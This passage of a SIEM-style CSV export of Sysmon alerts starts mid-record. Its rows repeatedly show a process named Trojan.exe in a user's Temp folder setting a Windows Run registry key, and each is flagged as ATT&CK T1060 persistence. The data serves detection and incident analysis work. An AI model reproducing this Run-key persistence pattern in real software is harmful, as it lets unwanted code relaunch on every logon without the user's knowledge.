Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:12.969299300Z"",""eventRecordID"":""1965"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:12.966\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:12.966"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:15.369",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:11.949 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:11.950349800Z"",""eventRecordID"":""1964"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:11.949\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:11.949"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:27:14.312",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:10.933 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:10.934778700Z"",""eventRecordID"":""1963"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:10.933\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:10.933"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:13.312",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:09.918 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:09.923776800Z"",""eventRecordID"":""1962"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:09.918\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:09.918"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:12.298",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:08.902 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:08.903840600Z"",""eventRecordID"":""1961"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:08.902\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:08.902"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:27:11.282",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:07.887 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:07.889184900Z"",""eventRecordID"":""1960"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:07.887\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:07.887"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:10.251",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:06.871 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:06.872907800Z"",""eventRecordID"":""1959"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:06.871\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:06.871"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:09.252",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:05.855 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:05.858360700Z"",""eventRecordID"":""1957"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:05.855\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:05.855"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:27:08.236",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:04.840 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:04.842719800Z"",""eventRecordID"":""1956"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:04.840\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:04.840"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:07.205",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:03.824 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:03.826205800Z"",""eventRecordID"":""1955"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:03.824\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:03.824"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:06.189",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:02.809 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:02.810146000Z"",""eventRecordID"":""1954"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:02.809\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:02.809"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:27:05.174",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:01.793 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 